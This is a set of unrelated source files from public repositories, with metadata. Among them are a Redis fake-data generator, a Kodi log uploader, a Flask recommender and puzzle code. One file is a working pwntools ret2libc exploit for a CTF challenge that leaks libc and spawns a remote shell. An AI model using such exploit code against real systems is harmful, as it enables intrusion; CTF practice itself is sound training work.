REDIS_HOSTNAME optional (default localhost)
REDIS_PORT optional (default 6379)
PREFIX_NAME optional (default cases)
COUNT (default 100000)
PAINT_ONLY optional (default False)
Example:
$ export REDIS_HOSTNAME=localhost; export REDIS_PORT=14000;
export PREFIX_NAME=case; export COUNT=10000;
python3 generate.py
'''
'''
returns a coherent record for a financial crimes case record
'''
def create_record(fake, id):
record = {}
statuses = ["new","investigating","resolved","on-hold","archived"]
priorities = ["low","med","high"]
date_range = [1389576338,1601861138] # Jan 13 2014 to Oct 5 2020
record["caseid"] = 10320000000 + id
record["status"] = statuses[random.randrange(0,len(statuses))]
record["investigator"] = random.randrange(501001,501501)
record["value"] = int(abs(random.gauss(10000,300000)))
record["files"] = str(uuid1()).replace("-","")
for _ in itertools.repeat(None,random.randrange(1,8)):
record["files"] = record["files"] + "," + str(uuid4()).replace("-","")
record["date_reported"] = random.randrange(date_range[0],date_range[1])
record["date_last_updated"] = record["date_reported"] + random.randrange(1728000,8640000) # + 20 days or 100 days
record["report_body"] = fake.text()
record["primary_acctno"] = fake.ean8(prefixes=("41","82","21","97"))
record["ssn"] = str(fake.ssn()).replace("-","")
record["phone"] = fake.phone_number()
record["ip"] = fake.ipv4()
# first, middle, last, address, country, ip
record["account_details"] = json.dumps(
{"Full Name": fake.name(),
"Street": fake.street_address(),
"Country": "US", "State": "NB",
"PostCode": fake.postcode()}
)
record["priority"] = priorities[random.randrange(0,len(priorities))]
record["related_tags"] = record["primary_acctno"]
for _ in itertools.repeat(None,random.randrange(4,19)):
record["related_tags"] = record["related_tags"] + "," + fake.ean8(prefixes=("41","82","21","97"))
# print(record)
return record
def paint(r, record_total, num_tags, num_sources, num_targets):
# get some related tags from existing records
seeds = r.scan(match="{}*".format(namespace),count=3)[1]
# print(seeds)
taglist = list()
for result in seeds:
tags = r.hget(result,"related_tags").split(",")
# print("tags: {}".format(tags))
for tag in tags[0:len(tags)-4]:
taglist.append(tag)
random.shuffle(taglist) # shuffle so it is less deterministic
# print(taglist)
# create the list of tags to be added to cases
to_be_added_tags = ""
for i in range(1,num_tags):
to_be_added_tags = to_be_added_tags + "," + taglist[i]
# print("{},".format(taglist[i]),flush=False,sep='',end='')
print("--- Tags to be added: {}".format(to_be_added_tags))
for _ in itertools.repeat(None, random.randrange(3,3+num_sources)):
# # find one target case
# sample = random.sample(r.scan(match="{}*".format(namespace),count=15)[1],1)
# print("******\n*** Main target case: {} ***\n******".format(sample))
targets = list()
for _ in itertools.repeat(None, random.randrange(3,3+num_targets)):
targets.append(namespace + str(create_record(fake, random.randrange(1,int(record_total)))["caseid"]))
print("Targets: {}".format(targets))
for target in targets:
related_tags = r.hget(target,"related_tags")
related_tags = related_tags + to_be_added_tags
#put record back
r.hset(target,"related_tags",related_tags)
print("\n")
if __name__ == '__main__':
batch = 1
count = environ.get('COUNT',10000)
redis_hostname = environ.get('REDIS_HOSTNAME','localhost')
redis_port = environ.get('REDIS_PORT',6379)
namespace = environ.get('NAMESPACE', "case") + ":"
paint_only = environ.get('PAINT',False)
r = Redis(host=redis_hostname, port=redis_port, decode_responses=True)
fake = Faker()
if paint_only:
print("### Painting records. ### ")
paint(r,count,num_tags=5,num_sources=6,num_targets=7)
exit()
else:
counter = 0
while counter <= int(count):
with r.pipeline(transaction=False) as pipe:
pipe.multi()
for _ in itertools.repeat(None, batch):
record = create_record(fake,counter)
if counter == 0:
print("Sample record: {}".format(json.dumps(record, indent=4)))
pipe.hset("{}{}".format(namespace,record["caseid"]),mapping=record)
counter = counter + 1
pipe.execute()
if counter % 1000 == 0 :
print(".",end="",flush=True)
print("\nFinished writing {} records.".format(counter))
print("### Painting records. ### ")
paint(r,count,num_tags=5,num_sources=6,num_targets=7)
|
[
"bbarnes@gmail.com"
] |
bbarnes@gmail.com
|
aeaa4ae222e109143d6db2ea3a9d6fc5c7073bad
|
9bd8ca4413654633d2f6903170cae35de7ed3cc9
|
/borobudur/pylib/peppercorn.py
|
9aae6f10bcaf788fcc477602439485b5d31e5e62
|
[] |
no_license
|
microvac/borobudur
|
841a2469ee7e98bdf2154d1f474578f98062d7b6
|
f5a39f027ad5ea5a49fd7a8fa23964d1ea14baf2
|
refs/heads/master
| 2016-09-05T16:09:02.946995
| 2013-07-26T17:40:10
| 2013-07-26T17:40:10
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,866
|
py
|
def data_type(value):
if ':' in value:
parts = value.split(":")
return [ parts[0].strip(), parts[1].strip() ]
return ('', value.strip())
def next(iterator):
idx = iterator["i"]
idx += 1
iterator["i"] = idx
return iterator["list"][idx]
def iter(item):
return {"i": -1, "list":item}
def partial(fn, arg):
def part():
return fn(arg)
return part
START = '__start__'
END = '__end__'
SEQUENCE = 'sequence'
MAPPING = 'mapping'
RENAME = 'rename'
all_typs = (SEQUENCE, MAPPING, RENAME)
def stream(next_token_gen, token):
"""
thanks to the effbot for
http://effbot.org/zone/simple-iterator-parser.htm
"""
op, data = token
if op == START:
name, typ = data_type(data)
out = []
if typ in all_typs:
if typ == MAPPING:
out = {}
def add(x, y):
out[x]= y
else:
out = []
add = lambda x, y: out.append(y)
token = next_token_gen()
op, data = token
while op != END:
key, val = stream(next_token_gen, token)
add(key, val)
token = next_token_gen()
op, data = token
if typ == RENAME:
if out:
out = out[0]
else:
out = ''
return name, out
else:
raise ValueError('Unknown stream start marker %s' % token)
else:
return op, data
def parse(fields):
""" Infer a data structure from the ordered set of fields and
return it."""
f = []
f.append((START, MAPPING))
f.extend(fields)
f.append((END, ''))
fields = f
src = iter(fields)
sr = stream(partial(next, src), next(src))
result = sr[1]
return result
|
[
"ghk@gozalikumara.com"
] |
ghk@gozalikumara.com
|
3a9fdf28d423ec47e703d3ba12a13aa87c65ffe0
|
eff67fc06b36bc58ebbb54322e6ba2ca248705c6
|
/server/sadserver.py
|
b17a69122f500cdefb47e9f09de87ed241ac9436
|
[] |
no_license
|
diacus/celda
|
af5180ea3fe0826839d398808c553c90162b472e
|
29fac053c1b7141133472c65569f424bcb3b087e
|
refs/heads/master
| 2020-05-17T22:31:30.174875
| 2011-08-04T21:37:15
| 2011-08-04T21:37:15
| 2,157,200
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,945
|
py
|
# -*- coding:utf-8 -*-
"""
@file sadserver.py
sadserver module
"""
import os, logging
from data.message import Message
from data.stream import FileStream, FragmentStream, BlockStream
from lib.common import MessagesENG as Messages, splitstream, \
notimplementedfunction
from lib.config import SADConfig
from lib.ida import disperse, recover
from lib.saderror import CorruptedFile
from server.sadnode import Node, Handler
from xmlrpclib import Fault
class ServerHandler(Handler):
"""
Class for handle requests
"""
def __init__(self):
Handler.__init__(self)
self._neighfrag = self._dbase.selectvirtualspaces()
self._neighfrag.choice()
self._neighblock = self._dbase.selectvirtualspaces()
self._neighblock.choice()
def processfile( self, (check, sdata) ):
"""
Splits a stream to a set of fragments and give them to other peers.
@param (check, sdata): Where:
* check is the stream's checksum
* sdata is a dict for build a FileStream instance
@raise CorruptedFile: Raise this exception if the given checksum doesn't
match with the stream's checksum
"""
conf = SADConfig()
stream = FileStream()
stream.load(sdata)
data = stream.getdata()
if not check == stream.checksum():
raise CorruptedFile
if len(stream) > conf.getmsu():
pieces = splitstream(data, conf.getmsu())
msg = Messages.FileSplitUp % (stream.getname(), len(pieces) )
print msg
logging.info( msg )
else:
pieces = [data]
msg = Messages.SmallFile % stream.getid()
print msg
logging.info( msg )
for i, piece in enumerate(pieces):
# Selecting next node
node = self._neighfrag.nextval()
# Packing the fragment stream
frag = FragmentStream(
stream.getid(),
stream.getname(),
i,
stream.getservice(),
piece
)
# Storing meta data
frag.registerfragment(self._dbase, node.getid())
if self.itsme( node ) :
self._localprocessfragment(frag)
else:
# Sending fragment
try:
msg = Messages.SendingFragTo % (
stream.getname(),
i,
node.getname(),
node.geturi()
)
# Logging transaction
print msg
logging.info(msg)
node.client.sendfragment(frag)
except Fault, cf:
print cf
logging.error( str(cf) )
def _localprocessfragment(self, fragment):
"""
@param fragment: FragmentStream instance
@see FragmentStream
"""
serv = fragment.getservice()
msg = Messages.SelectedService % serv
print msg
logging.info(msg)
if serv == "copy":
block = BlockStream(
serv,
fragment.getid(),
fragment.getpos(),
fragment.getdata(),
)
for b in [block, block]:
node = self._neighblock.nextval()
b.registerblock( self._dbase, node.getid())
if self.itsme( node ) :
self._localprocessblock(b)
else:
node.client.sendblock(b)
elif serv == "IDA":
##
# @todo utilizar IDA
for i, b in enumerate( disperse( fragment ) ):
node = self._neighblock.nextval()
b.registerblock( self._dbase, node.getid() )
if self.itsme( node ) :
self._localprocessblock(b)
else:
node.client.sendblock(b)
def processfragment(self, (check, fdata) ):
"""
@param sdata FragmentStream instance data
@raise CorruptedFile: Raise this exception if the given checksum
doesn't match with the stream's checksum
"""
fragment = FragmentStream()
fragment.load(fdata)
if not check == fragment.checksum():
del fragment
raise CorruptedFile
self._localprocessfragment(fragment)
def _localprocessblock( self, block ):
"""
@param block: FragmentStream instance
"""
conf = SADConfig()
bname = os.path.join( conf.getstoragepath(), block.getfilename() )
msg = Messages.ProcessingBlock % str(block)
logging.info(msg)
print msg
block.savetofile( bname )
def processblock(self, (check, bdata)):
"""
@param check: String. BlockStream's checksum
@param bdata: String, BlockStream's data
"""
block = BlockStream()
block.load(bdata)
if not check == block.checksum():
raise CorruptedFile
self._localprocessblock(block)
class Server ( Node ):
"""
Inner node class
"""
def __init__( self ):
Node.__init__(self)
self.__neighfrag = self._dbase.selectvirtualspaces()
self.__neighidas = self._dbase.selectvirtualspaces()
self._funcs[Message.SAVESTREAM] = ServerHandler.processfile
self._funcs[Message.SAVEFRAGMENT] = ServerHandler.processfragment
self._funcs[Message.SAVEBLOCK] = ServerHandler.processblock
self._funcs[Message.LOADSTREAM] = notimplementedfunction
self._funcs[Message.LOADFRAGMENT] = notimplementedfunction
self._funcs[Message.LOADBLOCK] = notimplementedfunction
|
[
"dr.guzsant@gmail.com"
] |
dr.guzsant@gmail.com
|
c414e9ccd1ff025567382317eb0f2d76d19577e8
|
650b516b1214c4d44fd6f04941e87e28e9049cde
|
/addons/script.mtvguide/logUploader.py
|
b3cfc3e025a8f1e2db88e609883ff4212d0b5e80
|
[] |
no_license
|
MultiWu/build
|
b85cc45a33b871f4ade58de8457fcd094761f385
|
f50a64f674b6499668e0a5758fe0879b016f5c38
|
refs/heads/master
| 2022-10-31T20:35:53.382826
| 2019-12-20T22:50:16
| 2019-12-20T22:50:16
| 228,462,984
| 0
| 3
| null | 2022-10-07T08:47:18
| 2019-12-16T19:46:39
|
Python
|
UTF-8
|
Python
| false
| false
| 2,534
|
py
|
# Copyright (C) 2016 Andrzej Mleczko
import os, urllib, urllib2, httplib, datetime
import xbmc, xbmcgui
from strings import *
URL = 'https://paste.ubuntu.com/'
LOGPATH = xbmc.translatePath('special://logpath')
LOGFILE = os.path.join(LOGPATH, 'kodi.log')
LOGFILE2 = os.path.join(LOGPATH, 'spmc.log')
LOGFILE3 = os.path.join(LOGPATH, 'xbmc.log')
class LogUploader:
def __init__(self):
if os.path.isfile(LOGFILE):
logContent = self.getLog(LOGFILE)
elif os.path.isfile(LOGFILE2):
logContent = self.getLog(LOGFILE2)
elif os.path.isfile(LOGFILE3):
logContent = self.getLog(LOGFILE3)
else:
xbmcgui.Dialog().ok(strings(30150).encode('utf-8'),"\n" + "Unable to find kodi log file")
return
logUrl = self.upload(logContent)
if logUrl:
xbmcgui.Dialog().ok(strings(31004).encode('utf-8'),"\n" + strings(69033).encode('utf-8') + logUrl)
else:
xbmcgui.Dialog().ok(strings(30150).encode('utf-8'),"\n" + strings(69034).encode('utf-8'))
def getLog(self, filename):
if os.path.isfile(filename):
content = None
with open(filename, 'r') as content_file:
content = content_file.read()
if content is None:
deb('LogUploader upload ERROR could not get content of log file')
return content
return None
def upload(self, data):
if data is None:
return None
params = {}
params['poster'] = 'anonymous'
params['content'] = data[-1500000:]
params['syntax'] = 'text'
params['expiration'] = 'week'
params = urllib.urlencode(params)
startTime = datetime.datetime.now()
try:
page = urllib2.urlopen(URL, params, timeout=10)
except Exception, ex:
deb('LogUploader upload failed to connect to the server, exception: %s' % getExceptionString())
deb('LogUploader Uploading files took: %s' % (datetime.datetime.now() - startTime).seconds)
return None
deb('LogUploader Uploading files took: %s' % (datetime.datetime.now() - startTime).seconds)
try:
page_url = page.url.strip()
deb('LogUploader success: %s' % str(page_url))
return page_url
except Exception, ex:
deb('LogUploader unable to retrieve the paste url, exception: %s' % getExceptionString())
return None
logup = LogUploader()
|
[
"oliwierminota@gmail.com"
] |
oliwierminota@gmail.com
|
341c928a26d1bea76347e0194dd5273eb02c961d
|
d0d79d0940f10494860b1363fe7f5cb89b9c9f43
|
/FlaskMain.py
|
969e30c59868d6c66cb3ef6df203df928265b85f
|
[] |
no_license
|
nyaang/GraduationDesign
|
d48cd3ba4b1d545d957aeb1f9b0e77904d6dfc83
|
77e821265bdfbacf983027cf9632e0cc0dd40739
|
refs/heads/master
| 2023-05-28T19:42:30.275301
| 2019-06-04T06:35:49
| 2019-06-04T06:35:49
| 173,213,790
| 0
| 0
| null | 2023-05-22T22:16:10
| 2019-03-01T01:25:06
|
Python
|
UTF-8
|
Python
| false
| false
| 975
|
py
|
from flask import Flask, request, render_template
from Similar import recommendation
app = Flask(__name__)
@app.route('/', methods=['GET'])
def login_form():
return render_template('form.html')
@app.route('/login', methods=['POST'])
def login():
userid = request.form['usernamelogin']
r = recommendation()
qids = r.similar(userid)
from pymongo import MongoClient
client = MongoClient()
db = client['NongGuanJia']
pcoll = db['NongGuanJiaByProblem']
print(qids)
questions = []
for qid in qids:
cursor = pcoll.find({"qid": int(qid) - 140000})
for document in cursor:
print(document)
questions.append(document)
for question in questions:
question['url'] = 'http://www.laodao.so/forum/info/' + \
str(question['qid'])
return render_template('home.html', questions=questions, uid=userid)
if __name__ == '__main__':
app.run()
|
[
"pccettfly@outlook.com"
] |
pccettfly@outlook.com
|
b4e66c85add42b6bd216c6d6d59ede705307c6f3
|
da402e2e618c05b05a57ac7ca8eb1a186791805b
|
/p149.py
|
c10f5c98528344c906b0891ac76a64ec5bb47b35
|
[] |
no_license
|
gandolfreddy/oajudge
|
c6dd923d88cdaba8ea17bc4cc473602d3a232b04
|
a4cbf433294129d276c10e54642731f782c9e424
|
refs/heads/main
| 2023-05-15T06:28:03.409025
| 2021-06-04T07:56:25
| 2021-06-04T07:56:25
| 373,759,905
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 177
|
py
|
# input
nums = list(map(int, input().split()))
# process
diff = 0
for num in nums:
diff = diff+1 if num % 2 else diff-1
diff = abs(diff)
# output
print(diff)
|
[
"noreply@github.com"
] |
gandolfreddy.noreply@github.com
|
67a787734cea2260dbf143a15e8b23400cadc45b
|
8275668382d2cfe43f77e4018caf073d78962b7a
|
/software/test.py
|
cfd7562b9e2d92b410d7e8faf2406451e0f816d6
|
[
"MIT"
] |
permissive
|
Extent421/bladeBench
|
15802724c292d10e4f37843cf55d113995cb980c
|
0eb01b88e21e66a7897b3094041196790848b3e0
|
refs/heads/master
| 2020-06-06T06:16:39.672330
| 2018-10-23T06:01:18
| 2018-10-23T06:01:18
| 42,681,998
| 8
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 946
|
py
|
import numpy as np
from numpy import pi
from bokeh.client import push_session
from bokeh.driving import cosine
from bokeh.plotting import figure, curdoc
test = [2,3,None, 0, None,5,None,7]
cleanTest = [value for value in test if value is not None]
print cleanTest, min(cleanTest), max(cleanTest), np.median(np.array( cleanTest )), np.mean(np.array( cleanTest ))
'''
x = np.linspace(0, 4*pi, 80)
y = np.sin(x)
p = figure()
r1 = p.line([0, 4*pi], [-1, 1], color="firebrick")
r2 = p.line(x, y, color="navy", line_width=4)
# open a session to keep our local document in sync with server
session = push_session(curdoc())
@cosine(w=0.03)
def update(step):
# updating a single column of the the *same length* is OK
r2.data_source.data["y"] = y * step
r2.glyph.line_alpha = 1 - 0.8 * abs(step)
curdoc().add_periodic_callback(update, 50)
session.show(p) # open the document in a browser
session.loop_until_closed() # run forever
'''
|
[
"Extent421@gmail.com"
] |
Extent421@gmail.com
|
4c1c01cf9174c1c10fdddd0909563f7a09bff0b5
|
2706fcad2e39cb4b168583d0ec47d06730e265cf
|
/aoc10-part2.py
|
32e46bec2a80a7765fdaf2ca3b1ceb495f2de55a
|
[
"MIT"
] |
permissive
|
robynsen/adventofcode2016
|
9a90a3415b7b396edfb2f311f6a06f15a8f0f7c3
|
83988f7b4c5b03a4c8d5f60cac1423b495c10856
|
refs/heads/master
| 2021-01-13T13:46:13.930971
| 2017-01-29T11:21:18
| 2017-01-29T11:21:18
| 76,351,573
| 0
| 0
| null | 2016-12-14T09:17:34
| 2016-12-13T11:11:37
|
Python
|
UTF-8
|
Python
| false
| false
| 3,305
|
py
|
import re
def add_value(my_bots, bot_i, val_n):
if bot_i in my_bots:
my_bots[bot_i].append(val_n)
else:
my_bots[bot_i] = [val_n]
def transfer_chips(my_bots, bot_id):
# note: does not cater to both high and low going to same bot that currently holds one chip
for key, value in my_bot_instr[bot_id].items():
# check if next bot has max chips
if str(value)[:6] != 'OUTPUT' and has_max_chips(my_bots, value):
transfer_chips(my_bots, value)
# now the recipient bot will have < 2 chips
tmp = 0
for key, value in my_bot_instr[bot_id].items():
if key == 'LOW':
tmp = min(my_bots[bot_id])
else:
tmp = max(my_bots[bot_id])
if str(value)[:6] != 'OUTPUT':
# send to next bot
add_value(my_bots, value, tmp)
elif int(str(value)[6:]) < 3:
# send to output
output_chips[int(str(value)[6:])].append(tmp)
my_bots[bot_id].remove(tmp)
def has_max_chips(my_bots, bot_id):
return (bot_id in my_bots and (len(my_bots[bot_id]) > 1))
with open('aoc10-input.txt', 'r') as infile:
# format: value 5 goes to bot 2
add_regex = re.compile(r"value ([0-9]+) goes to bot ([0-9]+)")
# format: bot 2 gives low to bot 1 and high to bot 0
move_regex = re.compile(r"bot ([0-9]+) gives low to (bot|output) ([0-9]+) and high to (bot|output) ([0-9]+)")
# x = for each both ID, a list of chip IDs it holds
my_bots = {}
# x = for each bot ID, a dict of key, value = LOW/HIGH, next bot ID
my_bot_instr = {}
output_chips = [[], [], []]
for line in infile:
add_result = add_regex.match(line)
move_result = move_regex.match(line)
if add_result:
my_value = int(add_result.group(1))
bot_target = int(add_result.group(2))
add_value(my_bots, bot_target, my_value)
elif move_result:
bot_src = int(move_result.group(1))
instr_low = move_result.group(2)
bot_low = int(move_result.group(3))
instr_high = move_result.group(4)
bot_high = int(move_result.group(5))
my_bot_instr[bot_src] = {}
for i in ((instr_low, bot_low, 'LOW'), (instr_high, bot_high, 'HIGH')):
if i[0] == 'bot':
my_bot_instr.setdefault(bot_src,[]).update({i[2]: i[1]})
elif i[0] == 'output':
my_bot_instr.setdefault(bot_src,[]).update({i[2]: 'OUTPUT' + str(i[1])})
# bots 174 125 59 output to 0, 1, 2
result = False
while not result:
# find bot with two chips and pass those on
for key, value in my_bots.items():
if len(value) > 1:
transfer_chips(my_bots, key)
break
result = True
for key, value in my_bots.items():
if len(value) > 1:
result = False
print('output_chips[0] * output_chips[1] * output_chips[2] =',
output_chips[0][0], '*', output_chips[1][0], '*', output_chips[2][0],
'=',
output_chips[0][0] * output_chips[1][0] * output_chips[2][0])
|
[
"noreply@github.com"
] |
robynsen.noreply@github.com
|
2e4b2ad75cda12788d8ceaba15754a4d584b3989
|
1f96ef70e6d58eac676490aee2b0557b66664360
|
/RL-Quadcopter-2/takeoff.py
|
ab0d0fe1d5ace15b9ee34cde940b4bc7fd751659
|
[] |
no_license
|
jrana1218/Udacity-Deep-Learning
|
6a4c079024a0e0e14b4cf022e3829aaba9e6c7b9
|
78daea32ef129068b804903cbdbd517de4dc7ef3
|
refs/heads/master
| 2021-04-12T09:28:48.108376
| 2018-06-13T01:49:43
| 2018-06-13T01:49:43
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,819
|
py
|
import numpy as np
from tasks.physics_sim import PhysicsSim
class Task():
"""Task (environment) that defines the goal and provides feedback to the agent."""
def __init__(self, init_pose=None, init_velocities=None,
init_angle_velocities=None, runtime=5., target_pos=None):
"""Initialize a Task object.
Params
======
init_pose: initial position of the quadcopter in (x,y,z) dimensions and the Euler angles
init_velocities: initial velocity of the quadcopter in (x,y,z) dimensions
init_angle_velocities: initial radians/second for each of the three Euler angles
runtime: time limit for each episode
target_pos: target/goal (x,y,z) position for the agent
"""
# Simulation
self.sim = PhysicsSim(init_pose, init_velocities, init_angle_velocities, runtime)
self.action_repeat = 3
self.state_size = self.action_repeat * 6
self.action_low = 0
self.action_high = 900
self.action_size = 4
# Goal
self.target_pos = target_pos if target_pos is not None else np.array([0., 0., 100.])
def get_reward(self):
reward = np.tanh(1 - 0.0005*(abs(self.sim.pose[:3] - self.target_pos)).sum()) # From 0.001
return reward
def step(self, rotor_speeds):
reward = 0
pose_all = []
for _ in range(self.action_repeat):
done = self.sim.next_timestep(rotor_speeds) # update the sim pose and velocities
reward += self.get_reward()
pose_all.append(self.sim.pose)
next_state = np.concatenate(pose_all)
return next_state, reward, done
def reset(self):
self.sim.reset()
state = np.concatenate([self.sim.pose] * self.action_repeat)
return state
|
[
"noreply@github.com"
] |
jrana1218.noreply@github.com
|
a3b85fab4392d4e726ea568ded7cfd814bdb69b7
|
4d5c46535be740c8d41bc0e711c752a4cff2a76b
|
/plonetheme/ewb_case/browser/viewlets.py
|
ff363c9e3be1a5ca0b67b06d5209e5a8337af044
|
[
"CC-BY-3.0"
] |
permissive
|
ewb-case/plonetheme.ewb_case
|
018a2eb0377fb80373d5aab1b6547ef5c8bd5789
|
391582be4b39838e5b769870a5e4ae3ae540f51a
|
refs/heads/master
| 2020-12-25T19:14:40.733234
| 2012-02-06T17:08:35
| 2012-02-06T17:08:35
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,140
|
py
|
from zope.component import getMultiAdapter
from Acquisition import aq_inner
from Products.Five.browser.pagetemplatefile import ViewPageTemplateFile
from plone.app.layout.viewlets.common import GlobalSectionsViewlet
from plonetheme.ewb_case.util import getSecondaryNavLabel
class PrimarySectionsViewlet(GlobalSectionsViewlet):
"""Viewlet for the primary navigation tabs.
"""
index = ViewPageTemplateFile('templates/sections.pt')
class SecondarySectionsViewlet(GlobalSectionsViewlet):
"""Viewlet for secondary navigation tabs.
"""
index = ViewPageTemplateFile('templates/labeled_sections.pt')
def update(self):
context = aq_inner(self.context)
portal_tabs_view = getMultiAdapter((context, self.request),
name='plonetheme.ewb_case.secondary_tabs_view')
self.portal_tabs = portal_tabs_view.topLevelTabs()
self.selected_tabs = self.selectedTabs(portal_tabs=self.portal_tabs)
self.selected_portal_tab = self.selected_tabs['portal']
self.sections_label = getSecondaryNavLabel(context)
|
[
"mattbierner@gmail.com"
] |
mattbierner@gmail.com
|
74d367ab4183f437bed2c594c315120d6baee7bb
|
959e69ec7b0246063ce5063414065a3960c9b912
|
/BACKEND/project/maria/Participant.py
|
3f3a79ec9f8a5bbe915ba3dce13456b80976a675
|
[] |
no_license
|
Atom02/increaseseminar
|
5e8fcdfdec0a55e4e3aef8591e17dfcedcbfcfab
|
5da51dfe7f76af6999337d5bf476dd813693e60c
|
refs/heads/main
| 2023-08-22T03:39:58.350150
| 2021-10-15T02:18:05
| 2021-10-15T02:18:05
| 344,347,635
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 600
|
py
|
from project import mariadb
class Participant(mariadb.Model):
id = mariadb.Column('id', mariadb.Integer, primary_key=True, autoincrement=True)
email = mariadb.Column('email', mariadb.String(255), unique=True, nullable=False)
name = mariadb.Column('name',mariadb.String(255), nullable=False)
affiliation = mariadb.Column('affiliation', mariadb.String(500), nullable=False)
uniqueURL = mariadb.Column('url_key', mariadb.String(500), unique=True, nullable=False)
country_id = mariadb.Column('country_id', mariadb.Integer, mariadb.ForeignKey('countrydb.id', ondelete='SET NULL'))
|
[
"candra.nurihsan9@gmail.com"
] |
candra.nurihsan9@gmail.com
|
94a77bf8a110b7ad909898141c77ad5a398f26f8
|
3b2b0c3edc800bfda49e58402bdf60dd42138615
|
/ciscn_2019_c/ciscn_2019_c_1/exp.py
|
cd4e6c81f6a5a619903fa2ecd44ef84e92c5c102
|
[] |
no_license
|
xmoct/Buuoj-Pwn
|
e3672ba1c1a914754596a7fb29384874b54683db
|
2425fa697e7ba0bd8a72eeb0e9b4ef07f89c9e17
|
refs/heads/main
| 2023-06-26T05:17:57.942639
| 2021-07-15T01:47:12
| 2021-07-15T01:59:24
| 386,145,955
| 1
| 0
| null | 2021-07-15T03:09:28
| 2021-07-15T03:09:28
| null |
UTF-8
|
Python
| false
| false
| 895
|
py
|
import sys
from pwn import *
context.log_level='debug'
#context.arch='amd64'
if len(sys.argv)==1 :
io=process('./ciscn_2019_c_1')
elf=ELF('./ciscn_2019_c_1')
libc=ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
else :
io=remote('node3.buuoj.cn',26267)
elf=ELF('./ciscn_2019_c_1')
libc=ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
pop_rdi_addr=0x400c83
pay='\x00'*0x58+p64(0x400c83)+p64(elf.got['puts'])+p64(elf.plt['puts'])+p64(elf.sym['main'])
io.recv()
io.sendline('1')
io.recv()
io.sendline(pay)
io.recv(0xc)
puts_addr=u64(io.recv(6)+'\x00\x00')
success('puts_addr:'+hex(puts_addr))
libc_base=puts_addr-libc.sym['puts']
success('libc_base'+hex(libc_base))
pay='\x00'*0x58+p64(0x400c83)+p64(libc_base+libc.search('/bin/sh\x00').next())+p64(libc_base+libc.sym['system'])+p64(elf.sym['main'])
io.recv()
io.sendline('1')
io.recv()
io.sendline(pay)
# gdb.attach(io)
# pause()
io.interactive()
|
[
"ilovekeer@users.noreply.github.com"
] |
ilovekeer@users.noreply.github.com
|
8522643b85ce02948fca10a4a2bffc35cf079cab
|
7dfdd1323f2e1278b6be7a2edd8aeb5508a5428a
|
/hw/hw2/tests/q2a.py
|
461af0d56e5e98498e5be691a81e9e44b1e6d4f4
|
[] |
no_license
|
DS-100/su21
|
4f1932d57b92f488f359be667a5ec79a4702f60e
|
e62a80452d546722fbea2651e27e3bf276ce5453
|
refs/heads/main
| 2023-07-10T23:28:37.918626
| 2021-08-05T20:51:09
| 2021-08-05T20:51:09
| 375,925,180
| 4
| 6
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 485
|
py
|
test = { 'name': 'q2a',
'points': 1,
'suites': [ { 'cases': [ { 'code': '>>> assert prob_at_most(3, 0.4, 1) >= 0;\n>>> assert prob_at_most(5, 0.6, 3) <= 1;\n>>> assert prob_at_most(2, 3, 4) == 0\n',
'hidden': False,
'locked': False}],
'scored': True,
'setup': '',
'teardown': '',
'type': 'doctest'}]}
|
[
"57054493+rohilkanwar@users.noreply.github.com"
] |
57054493+rohilkanwar@users.noreply.github.com
|
d96501f1b72e6d5fd13ba40b2f5ae1f6aaf256c2
|
e6d0bbc56932580f8e4be99fac6241e040ba5be7
|
/src/inAll.py
|
d352d073c99127b3d22c99099f955e33dbd36dcb
|
[] |
no_license
|
Parkat13/diploma
|
8e990b55054e2171c72cf701b2631c814cd3630e
|
5ea970210f7ec567bb3caec629ba490cb31575f3
|
refs/heads/master
| 2018-10-01T05:06:00.352595
| 2018-06-08T00:31:07
| 2018-06-08T00:31:07
| 115,097,721
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,839
|
py
|
# -*- coding: utf-8 -*-
import sys
import codecs
reload(sys)
sys.setdefaultencoding('utf-8')
f1 = codecs.open('TUpdateRangMI.txt', 'r', 'utf8')
f2 = codecs.open('TUpdateRangAugmentedMI.txt', 'r', 'utf8')
f3 = codecs.open('TUpdateRangNormalizedMI.txt', 'r', 'utf8')
f4 = codecs.open('TUpdateRangTrueMI.txt', 'r', 'utf8')
f5 = codecs.open('TUpdateRangCubicMI.txt', 'r', 'utf8')
f6 = codecs.open('TUpdateRangT-Score.txt', 'r', 'utf8')
f7 = codecs.open('TUpdateRangDC.txt', 'r', 'utf8')
f8 = codecs.open('TUpdateRangModifiedDC.txt', 'r', 'utf8')
f9 = codecs.open('TUpdateRangChi-Square.txt', 'r', 'utf8')
f10 = codecs.open('TUpdateRangLLR.txt', 'r', 'utf8')
f11 = codecs.open('TUpdateRangWord2vec.txt','r','utf8')
f12 = codecs.open('TUpdateRangWordsWord2vec.txt','r','utf8')
f13 = codecs.open('TUpdateRangC-Value.txt','r','utf8')
f14 = codecs.open('TUpdateRangSinonim.txt','r','utf8')
f_res = open('TUpdateRang.txt', 'w')
dict = {}
dict_met = {}
for f in [f1, f2, f3, f4, f5, f6, f7, f8, f9, f10, f11, f12, f13, f14]:
a = f.read().split()
for i in range(len(a)/4):
if (a[i*4] + ' ' + a[i*4 + 1]) in dict:
if dict[a[i*4] + ' ' + a[i*4 + 1]] > float(a[i*4 + 2]):# отличается для T и N
dict[a[i*4] + ' ' + a[i*4 + 1]] = float(a[i*4 + 2])
dict_met[a[i*4] + ' ' + a[i*4 + 1]] = a[i*4 + 3]
else:
dict[a[i*4] + ' ' + a[i*4 + 1]] = float(a[i*4 + 2])
dict_met[a[i*4] + ' ' + a[i*4 + 1]] = a[i*4 + 3]
for i in sorted(dict, key=dict.__getitem__, reverse=False):# отличается для T и N
f_res.write(str(i) + ' ' + str(int(dict[i])) + ' ' + dict_met[i] + '\n')
f_res.close()
f1.close()
f2.close()
f3.close()
f4.close()
f5.close()
f6.close()
f7.close()
f8.close()
f9.close()
f10.close()
f11.close()
f12.close()
f13.close()
f14.close()
|
[
"noreply@github.com"
] |
